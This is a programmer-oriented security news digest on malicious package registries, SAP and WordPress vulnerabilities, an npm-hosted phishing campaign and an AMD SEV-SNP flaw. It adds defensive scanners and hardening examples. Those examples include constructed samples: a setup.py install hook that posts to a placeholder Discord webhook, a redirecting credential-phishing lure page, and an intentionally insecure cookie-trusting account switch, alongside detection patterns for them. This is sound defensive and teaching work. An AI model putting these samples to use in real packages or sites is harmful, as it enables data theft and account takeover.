Programmer’s Digest #155
10/08/2025-10/15/2025 npm, PyPI, and RubyGems Packages, Critical Vulnerabilities in NetWeaver, Hackers Exploit Auth Bypass in Service Finder WordPress Theme and More.
1. npm, PyPI, and RubyGems Packages Found Sending Developer Data to Discord Channels
Researchers found malicious packages on npm, PyPI and RubyGems that use Discord webhooks as a command-and-control channel to exfiltrate stolen data. Discord webhooks post to channels without authentication and are effectively write-only, so defenders can’t read previous posts from the URL. Examples include npm’s mysql-dumpdiscord (steals config/.env files), nodejs.discord (logs via webhook), PyPI packages malinssx/malicus/maliinn (trigger HTTP calls on pip install), and RubyGems’ sqlcommenter_rails (collects host files like /etc/passwd and sends them to a hard-coded webhook). By abusing free, fast webhooks and hiding in install-time hooks or build scripts, attackers can siphon .env files, API keys, credentials, and host details from developer machines and CI runners before runtime detection. The same researchers also flagged 338 malicious npm packages tied to a North Korean “Contagious Interview” campaign that lures developers with fake job offers and booby-trapped repos, using typosquats to deliver stealers and backdoors like BeaverTail and InvisibleFerret.
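The two ingredients described above, code that runs at install time and a hard-coded Discord webhook, are both visible in a package's manifest or install script before anything is executed. The following scanner, an added example written for this digest and not code from the research or from any package named in the article, flags npm lifecycle hooks and setup.py install commands that sit next to a webhook URL; the sample manifests are constructed.

```python
"""Scan package manifests and install scripts for code that runs at install
time together with a Discord webhook URL.  Added example for this digest, not
code from the research or the packages in the article; samples are constructed."""
import json
import re

# Discord webhook URLs share one shape: /api/webhooks/<numeric id>/<token>
DISCORD_WEBHOOK_RE = re.compile(
    r"https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/\d+/[A-Za-z0-9_\-]+"
)
# npm lifecycle scripts that run during `npm install` without being invoked explicitly
NPM_INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# setup.py constructs that execute code during `pip install`
PIP_INSTALL_HOOK_RE = re.compile(
    r"cmdclass\s*=|class\s+\w+\s*\(\s*(?:install|develop|egg_info)\s*\)"
)
# outbound network primitives in Python install scripts
PY_NETWORK_RE = re.compile(
    r"urllib\.request|urlopen\(|requests\.(?:post|get)|http\.client|socket\."
)


def find_webhooks(text: str) -> list:
    """Return every Discord webhook URL that appears in the text."""
    return DISCORD_WEBHOOK_RE.findall(text)


def audit_npm_manifest(package_json: str) -> dict:
    """Inspect a package.json string: which install-time hooks it declares and
    whether a webhook URL appears anywhere in it."""
    manifest = json.loads(package_json)
    scripts = manifest.get("scripts") or {}
    hooks = {name: cmd for name, cmd in scripts.items() if name in NPM_INSTALL_HOOKS}
    webhooks = find_webhooks(package_json)
    return {
        "name": manifest.get("name"),
        "install_hooks": hooks,
        "webhooks": webhooks,
        # An exfil endpoint plus code that runs on install is the combination to escalate.
        "suspicious": bool(hooks) and bool(webhooks),
    }


def audit_setup_py(source: str) -> dict:
    """Inspect setup.py source for install-time hooks, network calls and webhooks."""
    runs_at_install = bool(PIP_INSTALL_HOOK_RE.search(source))
    network = bool(PY_NETWORK_RE.search(source))
    webhooks = find_webhooks(source)
    return {
        "runs_at_install": runs_at_install,
        "network": network,
        "webhooks": webhooks,
        "suspicious": runs_at_install and (network or bool(webhooks)),
    }


# Constructed samples (not real packages).
MALICIOUS_PACKAGE_JSON = json.dumps({
    "name": "example-config-dumper",
    "version": "1.0.0",
    "scripts": {"postinstall": "node ./collect.js", "test": "echo ok"},
    "config": {"report": "https://discord.com/api/webhooks/123456789012345678/AbCdEfGh_ijkl-MNOP"},
})
BENIGN_PACKAGE_JSON = json.dumps({
    "name": "example-native-addon",
    "version": "2.3.1",
    "scripts": {"install": "node-gyp rebuild", "test": "jest"},
})
MALICIOUS_SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install
import urllib.request

class PostInstall(install):
    def run(self):
        install.run(self)
        urllib.request.urlopen("https://discord.com/api/webhooks/42/constructed_token")

setup(name="example-pkg", version="0.1", cmdclass={"install": PostInstall})
'''

if __name__ == "__main__":
    for label, result in (
        ("malicious package.json", audit_npm_manifest(MALICIOUS_PACKAGE_JSON)),
        ("benign package.json", audit_npm_manifest(BENIGN_PACKAGE_JSON)),
        ("malicious setup.py", audit_setup_py(MALICIOUS_SETUP_PY)),
    ):
        print(label, "->", "SUSPICIOUS" if result["suspicious"] else "ok", result)
```

The benign sample shows why an install hook alone is not a verdict: native add-ons legitimately run node-gyp on install. Run the checks against the unpacked tarball rather than the registry metadata, since the webhook is usually in the script file the hook invokes rather than in package.json itself.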
2. SAP Patches Critical Vulnerabilities in NetWeaver, Print Service, SRM
SAP released 16 new and updated security notes in its October 2025 Patch Day, including three addressing critical vulnerabilities. The most severe, CVE-2025-42944 (CVSS 10.0), is an insecure deserialization flaw in NetWeaver AS Java. Originally patched in September, the new update adds JVM-wide filters (jdk.serialFilter) to block unsafe class deserialization. Another critical bug, CVE-2025-42937 (CVSS 9.8), is a directory traversal flaw in Print Service that could let unauthenticated attackers overwrite system files. SAP also fixed CVE-2025-42910 (CVSS 9.0), an unrestricted file upload vulnerability in Supplier Relationship Management (SRM) that may allow malware uploads. Two high-severity flaws were addressed in Commerce Cloud (DoS bug, CVE-2025-5115) and Data Hub Integration Suite (misconfiguration flaw, CVE-2025-48913). Ten additional notes fix medium- and low-severity issues across NetWeaver, S/4HANA, and other platforms. No active exploitation has been reported, but SAP urges prompt patching due to known targeting of its software.
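The jdk.serialFilter mechanism that the NetWeaver fix relies on is a pattern string, set with the `-Djdk.serialFilter=` system property or in the JDK's java.security file, that the JVM consults before instantiating any class from a serialized stream. The model below, an added example written for this digest and not SAP's or the JDK's code, reproduces the decision rules documented for java.io.ObjectInputFilter so an administrator can see what a given filter string will do; module-qualified patterns are left out and the filters themselves are constructed.

```python
"""Model of how a jdk.serialFilter pattern decides whether a class may be
deserialized.  Added example for this digest, not SAP's or the JDK's code; it
follows the documented rules of java.io.ObjectInputFilter: resource limits
(maxdepth, maxrefs, maxbytes, maxarray) are checked first, then class patterns
in order with the first match deciding; '!' rejects, '.**' covers a package and
its subpackages, '.*' one package only, a trailing '*' is a prefix match, and a
class no pattern matches is UNDECIDED, which ObjectInputStream then admits.
Module-qualified patterns ('module/pattern') are not modelled."""
from enum import Enum


class Status(Enum):
    ALLOWED = "ALLOWED"
    REJECTED = "REJECTED"
    UNDECIDED = "UNDECIDED"


LIMIT_KEYS = {"maxdepth": "depth", "maxrefs": "references",
              "maxbytes": "stream_bytes", "maxarray": "array_length"}


def parse_filter(pattern: str):
    """Split a filter string into numeric limits and ordered class patterns."""
    limits, class_patterns = {}, []
    for raw in pattern.split(";"):
        token = raw.strip()
        if not token:
            continue
        key, eq, value = token.partition("=")
        if eq and key in LIMIT_KEYS:
            limits[LIMIT_KEYS[key]] = int(value)
        else:
            class_patterns.append(token)
    return limits, class_patterns


def match_class(pattern: str, class_name: str) -> bool:
    """True if one non-negated class pattern matches the class name."""
    if pattern.endswith(".**"):                  # package and all subpackages
        return class_name.startswith(pattern[:-2])
    if pattern.endswith(".*"):                   # classes directly in the package
        prefix = pattern[:-1]
        return class_name.startswith(prefix) and "." not in class_name[len(prefix):]
    if pattern.endswith("*"):                    # plain prefix match
        return class_name.startswith(pattern[:-1])
    return pattern == class_name                 # exact class name


def check_input(pattern, class_name=None, depth=1, references=0,
                stream_bytes=0, array_length=-1) -> Status:
    """Decide one deserialization step, mirroring ObjectInputFilter.checkInput."""
    limits, class_patterns = parse_filter(pattern)
    inf = float("inf")
    if (depth > limits.get("depth", inf)
            or references > limits.get("references", inf)
            or stream_bytes > limits.get("stream_bytes", inf)):
        return Status.REJECTED
    if class_name is None:                       # limit-only callbacks carry no class
        return Status.UNDECIDED
    if class_name.endswith("[]"):                # arrays: check length, then the component type
        if 0 <= array_length and array_length > limits.get("array_length", inf):
            return Status.REJECTED
        class_name = class_name.rstrip("[]")
    for p in class_patterns:
        negated = p.startswith("!")
        if match_class(p[1:] if negated else p, class_name):
            return Status.REJECTED if negated else Status.ALLOWED
    return Status.UNDECIDED


# Constructed allow-list style filter: deny one legacy package outright, admit
# java.util and java.lang, and reject everything else via the closing "!*".
STRICT_FILTER = ("maxdepth=20;maxrefs=1000;maxbytes=1048576;maxarray=10000;"
                 "!com.example.legacy.**;java.util.*;java.lang.*;!*")
# Same list without the closing "!*": unmatched classes fall through as UNDECIDED.
LEAKY_FILTER = STRICT_FILTER.rsplit(";", 1)[0]

if __name__ == "__main__":
    for cn in ("java.util.HashMap", "java.util.concurrent.ConcurrentHashMap",
               "com.example.legacy.util.Transformer"):
        print(f"{cn}: strict={check_input(STRICT_FILTER, cn).value} "
              f"leaky={check_input(LEAKY_FILTER, cn).value}")
```

The LEAKY_FILTER case is the one to watch for when reviewing a deployed filter: without a terminating `!*`, a class that matches no pattern is merely UNDECIDED and the stream goes on to deserialize it, so a filter that only lists the packages you expect is not an allow list until it rejects the remainder.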
3. Hackers Exploit Auth Bypass in Service Finder WordPress Theme
Hackers are actively exploiting a critical flaw (CVE-2025-5947, CVSS 9.8) in the Service Finder WordPress theme that lets them bypass authentication and log in as administrators. The bug, caused by improper validation of the original_user_id cookie in the service_finder_switch_back() function, affects versions 6.0 and earlier. With admin access, attackers can fully control a WordPress site, create accounts, upload PHP files, and export databases. Security firm Wordfence has recorded over 13,800 exploit attempts since August 1, with attack spikes exceeding 1,500 daily in late September. The flaw was discovered by researcher “Foxyyy” and patched by developer Aonetheme in version 6.1, released July 17. Most attacks come from five IPs, though new ones may appear. Administrators should review logs for suspicious activity or new accounts, block the listed IPs, and update immediately, as attackers can erase traces of compromise once they gain admin access.
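The defect class here is a "switch back to my original account" path that reads the target identity out of a cookie the browser controls. The snippet below, an added example written for this digest in Python rather than the theme's PHP, puts that pattern beside a hardened version that only honours a server-signed, expiring token bound to the current session; the function names, token format and sample users are assumptions.

```python
"""Account-switch 'return' path that trusts a client-controlled cookie, beside a
version that verifies a server-issued token.  Added example for this digest,
not the theme's code; names, token format and sample data are constructed."""
import base64
import hashlib
import hmac
import json
import time

SERVER_KEY = b"constructed-server-secret"  # constructed; load from protected config in a real deployment


def switch_back_insecure(cookies: dict, users: dict):
    """Vulnerable pattern: whoever sets original_user_id becomes that user."""
    return users.get(cookies.get("original_user_id"))


def issue_switch_token(original_user_id: str, session_id: str, ttl: int = 900, now=None) -> str:
    """Server-issued, signed record that this session switched away from a user."""
    payload = {"uid": original_user_id, "sid": session_id,
               "exp": int((now if now is not None else time.time()) + ttl)}
    body = base64.urlsafe_b64encode(json.dumps(payload, separators=(",", ":")).encode()).decode()
    sig = hmac.new(SERVER_KEY, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{sig}"


def switch_back_secure(cookies: dict, users: dict, current_session_id: str, now=None):
    """Hardened pattern: only a valid, unexpired token bound to this session is honoured."""
    token = cookies.get("switch_back")
    if not token or "." not in token:
        return None
    body, sig = token.rsplit(".", 1)
    expected = hmac.new(SERVER_KEY, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):    # forged or tampered token
        return None
    try:
        payload = json.loads(base64.urlsafe_b64decode(body))
    except (ValueError, TypeError):               # signature ok but body unreadable
        return None
    current = now if now is not None else time.time()
    if payload.get("exp", 0) < current:           # stale token
        return None
    if payload.get("sid") != current_session_id:  # token lifted from another session
        return None
    return users.get(payload.get("uid"))


# Constructed sample data.
USERS = {"1": {"login": "admin", "role": "administrator"},
         "7": {"login": "visitor", "role": "subscriber"}}
FORGED_COOKIES = {"original_user_id": "1"}  # anything a browser can send


def demo():
    """Role each path grants to a visitor who presents only a forged cookie."""
    insecure = switch_back_insecure(FORGED_COOKIES, USERS)
    secure = switch_back_secure({"switch_back": "1"}, USERS, "sess-A")
    return (insecure["role"] if insecure else None, secure["role"] if secure else None)


if __name__ == "__main__":
    print("insecure grants:", demo()[0], "| secure grants:", demo()[1])
```

Binding the token to the session id is what stops a token captured from one browser being replayed in another, and the expiry keeps a token that leaks into logs or backups from staying valid indefinitely; the HMAC check alone only proves the server issued it at some point.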
4. 175 Malicious npm Packages with 26,000 Downloads Used in Credential Phishing Campaign
Researchers flagged 175 malicious npm packages (26,000 downloads) used in a phishing campaign dubbed Beamglea, targeting 135+ industrial, tech, and energy firms. The packages act as hosting for redirect scripts served via npm’s registry and unpkg.com CDN rather than executing malware on install. A script named redirect_generator.py programmatically publishes packages like redirect-xxxxxx, injecting victim emails and phishing URLs. Each package provides an HTML file that loads beamglea.js from UNPKG; that JavaScript redirects victims to credential-harvesting pages while pre-filling the email field, boosting success rates. Socket found over 630 such HTML files masquerading as purchase orders, specs, or project docs. Distribution likely relies on phishing emails that prompt recipients to open the crafted HTML. Attackers leverage free, trusted infrastructure (npm + UNPKG) to build resilient, low-cost phishing infrastructure, avoiding detection by not performing malicious actions during package install. The campaign underscores how legitimate platforms can be abused as hosting for targeted credential theft.
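Because the malicious behaviour lives in the delivered HTML rather than in the install step, the useful detection point is the attachment itself: a near-empty document that pulls a script from a package CDN, carries a recipient address, and redirects. The inspector below, an added example written for this digest and not Socket's tooling, scores an HTML file on those indicators; the CDN host list, the thresholds and both sample documents are constructed.

```python
"""Triage check for a lure HTML file: script loaded from a package CDN, an
embedded e-mail address, a redirect, and almost no visible content.  Added
example for this digest, not Socket's tooling; hosts, thresholds and the
sample documents are constructed."""
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

PACKAGE_CDNS = {"unpkg.com", "cdn.jsdelivr.net"}  # hosts that serve raw package contents
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
REDIRECT_RE = re.compile(
    r"(?:window\.|document\.)?location(?:\.href)?\s*=|location\.replace\s*\(|location\.assign\s*\("
)
MIN_VISIBLE_TEXT = 200  # a real document has body text; a lure usually has almost none


class LureInspector(HTMLParser):
    """Collects script sources, inline script text, meta refresh and visible text length."""

    def __init__(self):
        super().__init__()
        self.external_scripts = []
        self.inline_script = []
        self.meta_refresh = False
        self.visible_chars = 0
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            if a.get("src"):
                self.external_scripts.append(a["src"])
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            self.meta_refresh = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline_script.append(data)
        else:
            self.visible_chars += len(data.strip())


def inspect_html(document: str) -> dict:
    """Return the indicators found and an overall verdict for one HTML file."""
    p = LureInspector()
    p.feed(document)
    p.close()
    cdn_scripts = [s for s in p.external_scripts if urlparse(s).hostname in PACKAGE_CDNS]
    emails = sorted(set(EMAIL_RE.findall(document)))
    redirects = p.meta_refresh or bool(REDIRECT_RE.search("\n".join(p.inline_script)))
    return {
        "cdn_scripts": cdn_scripts,
        "emails": emails,
        "redirects": redirects,
        "visible_chars": p.visible_chars,
        # Script from a package CDN + redirect or embedded address + almost no content.
        "suspicious": bool(cdn_scripts) and (redirects or bool(emails))
                      and p.visible_chars < MIN_VISIBLE_TEXT,
    }


# Constructed samples: a lure shaped like the one described, and a page that
# legitimately loads a library from the same CDN.
LURE_HTML = """<!doctype html><html><head><title>Purchase Order</title>
<script src="https://unpkg.com/example-redirect-pkg@1.0.0/lure.js"></script></head>
<body><script>
window.recipient = "recipient@example.com";
window.location.href = "https://example.invalid/form?u=" + window.recipient;
</script></body></html>"""

BENIGN_HTML = ("""<!doctype html><html><head><title>Release notes</title>
<script src="https://unpkg.com/example-lib@3.0.0/dist/lib.min.js"></script></head>
<body><p>""" + "Release notes for version 3.0.0 describe the changes in detail. " * 6
               + "</p></body></html>")

if __name__ == "__main__":
    for label, doc in (("lure", LURE_HTML), ("benign", BENIGN_HTML)):
        print(label, "->", inspect_html(doc))
```

The benign sample exists to keep the CDN indicator in proportion: loading a library from unpkg.com is ordinary web development, and it is the combination with a redirect or a pre-filled address in an otherwise empty document that marks the file as a lure.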
5. RMPocalypse: Single 8-Byte Write Shatters AMD’s SEV-SNP Confidential Computing
Chipmaker AMD has released fixes for a security flaw named “RMPocalypse,” which undermines the confidentiality guarantees of its Secure Encrypted Virtualization (SEV-SNP) technology. According to ETH Zürich researchers, the attack exploits incomplete protections, allowing a single malicious write to the Reverse Map Paging (RMP) table—a critical structure storing security metadata for all DRAM pages. The vulnerability (CVE-2025-0033, CVSS score 5.9) is a race condition occurring during the initialization of the RMP by the AMD Secure Processor (ASP/PSP). This permits a malicious hypervisor to manipulate the RMP’s initial content, compromising the memory integrity of SEV-SNP protected virtual machines. A compromised RMP voids all SEV-SNP integrity and confidentiality guarantees, enabling attackers to bypass isolation, forge attestations, and exfiltrate all secrets with a 100% success rate.
Impacted products include multiple AMD EPYC™ 7003, 8004, 9004, and 9005 series processors. While fixes are available for many, some embedded series updates are planned for November 2025. Microsoft and Supermicro are also addressing the flaw in their respective platforms. This incident highlights a critical catch-22 where the security mechanism itself was not fully protected during VM startup.